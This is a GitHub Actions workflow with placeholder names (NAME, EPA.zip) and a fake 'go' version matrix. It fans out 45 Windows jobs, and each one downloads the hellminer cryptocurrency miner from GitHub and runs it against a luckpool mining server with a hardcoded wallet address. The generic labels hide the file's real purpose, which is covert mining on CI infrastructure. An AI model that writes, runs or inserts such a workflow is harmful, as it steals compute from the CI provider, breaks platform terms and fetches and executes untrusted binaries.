name: NAME

on: [workflow_dispatch]

jobs:
  build:
    name: NAME
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_win64_avx2.zip -OutFile EPA.zip
    - name: Extract
      run: Expand-Archive EPA.zip
    - name: RUNNING
      run: ./hellminer.exe -c stratum+tcp://ap.luckpool.net:3956#xnsub -u RUErJPuMTPL84t76vT8CjLyBY4ZLGvzUW9.RMX2020 -p x --cpu 1
    - name: DONE
      run: exit
